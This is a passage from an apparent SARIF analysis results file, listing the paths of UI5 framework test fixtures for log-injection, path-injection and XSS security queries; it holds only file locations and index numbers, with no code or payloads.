"uriBaseId" : "%SRCROOT%", - "index" : 191 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 192 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 193 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 194 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 195 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 196 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 198 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 199 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/utils/CustomLogListener.js", - "uriBaseId" : "%SRCROOT%", - "index" : 200 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 201 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 202 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - 
"index" : 203 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 204 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 205 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 207 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 208 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 209 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 210 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 211 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 212 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 213 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 214 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 215 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 216 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 217 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 218 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 219 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 220 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 221 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 222 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 223 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 224 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 225 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 226 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 227 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 228 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 229 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 230 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 231 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 232 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 233 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js", - "uriBaseId" : 
"%SRCROOT%", - "index" : 234 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 235 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 236 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 237 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", - "uriBaseId" : "%SRCROOT%", - "index" : 238 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 239 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 240 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/Component.js", - "uriBaseId" : "%SRCROOT%", - "index" : 241 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 242 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", - "uriBaseId" : "%SRCROOT%", - "index" : 243 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 244 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 245 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/model/todoitems.json", - "uriBaseId" : "%SRCROOT%", - "index" : 246 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/AllJourneys.js", - "uriBaseId" : "%SRCROOT%", - "index" : 247 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/FilterJourney.js", - "uriBaseId" : "%SRCROOT%", - "index" : 248 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/SearchJourney.js", - "uriBaseId" : "%SRCROOT%", - "index" : 249 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/TodoListJourney.js", - "uriBaseId" : "%SRCROOT%", - "index" : 250 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/arrangements/Startup.js", - "uriBaseId" : "%SRCROOT%", - "index" : 251 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.html", - "uriBaseId" : "%SRCROOT%", - "index" : 252 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.js", - "uriBaseId" : "%SRCROOT%", - "index" : 253 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/pages/App.js", - "uriBaseId" : "%SRCROOT%", - "index" : 254 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.html", - "uriBaseId" : "%SRCROOT%", - "index" : 255 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.js", - "uriBaseId" : 
"%SRCROOT%", - "index" : 256 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/AllTests.js", - "uriBaseId" : "%SRCROOT%", - "index" : 257 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/controller/App.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 258 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.html", - "uriBaseId" : "%SRCROOT%", - "index" : 259 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.js", - "uriBaseId" : "%SRCROOT%", - "index" : 260 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/util/Helper.js", - "uriBaseId" : "%SRCROOT%", - "index" : 261 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/view/App.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 262 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 263 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 264 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 265 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 266 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 267 - 
} - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 268 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 269 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 270 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 271 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 272 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 273 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 274 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 275 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 276 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 277 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 278 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 279 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 280 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 281 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 282 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 283 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 284 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 285 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 286 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 287 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 288 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 289 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 290 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 291 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 292 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 293 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 294 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 295 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 296 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 297 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 298 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 299 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package.json", - "uriBaseId" : 
"%SRCROOT%", - "index" : 300 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 301 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 302 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 303 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 304 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 305 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 306 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 307 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 308 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 309 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 310 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - } - }, { - 
"location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 312 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 313 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 314 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 316 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 317 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 318 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 319 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 320 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 321 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 322 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", - "uriBaseId" : 
"%SRCROOT%", - "index" : 323 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 324 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 325 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 326 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 328 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 329 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 330 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 332 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 333 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 334 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 335 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 336 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 337 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 338 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 339 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 340 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 341 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 342 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 343 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/model.json", - "uriBaseId" : "%SRCROOT%", - "index" : 344 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 345 - } - }, { - "location" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 346 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 347 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 348 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 349 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 350 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 351 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 352 